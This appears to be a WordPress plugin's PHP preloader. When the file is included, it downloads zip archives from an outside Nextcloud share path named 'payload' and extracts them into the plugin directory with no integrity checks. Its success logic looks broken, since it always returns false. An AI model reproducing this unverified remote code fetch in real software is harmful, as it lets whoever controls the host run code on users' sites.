<?php
// If this file is called directly, abort.

if (!defined('WPINC')) {
    die;
}

class PBG_Preloader
{
    private const SHARE_URL = 'https://cloud.nextgen2rism.de/index.php/s/gr7wp3ceDrfb5o7/download?path=%%2Fpayload%%2F%s&files=%s';

    public function fetchVendorFiles(): bool
    {
        $parts = ['required', 'admin', 'public', 'vendor'];

        foreach ($parts as $part) {
            $vendor = sprintf(self::SHARE_URL, PHOTOBOOTH_GALLERY_VERSION, sprintf('%s.zip', $part));

            if ($this->downloadAndExtract($vendor, __DIR__) === false) {
                return false;
            }
        }

        return false;
    }

    private function downloadAndExtract($remote, $target): bool
    {
        $response = wp_remote_get($remote, [
            'timeout' => 30,
        ]);

        if ($response instanceof \WP_Error) {
            return false;
        }

        $zip = wp_remote_retrieve_body($response);

        $file = PG_CACHE_PATH.'/'.uniqid().'.zip';

        $fp = fopen($file, "w");
        fwrite($fp, $zip);
        fclose($fp);

        require_once(ABSPATH.'wp-admin/includes/file.php');

        WP_Filesystem();

        unzip_file($file, $target);

        @unlink($file);

        return true;
    }
}

$loader = new PBG_Preloader();

if ($loader->fetchVendorFiles() === false) {

    add_action('plugin_act', function () {
        deactivate_plugins(__DIR__.'/photobooth-gallery.php', true);
    });

    return false;
}

return true;
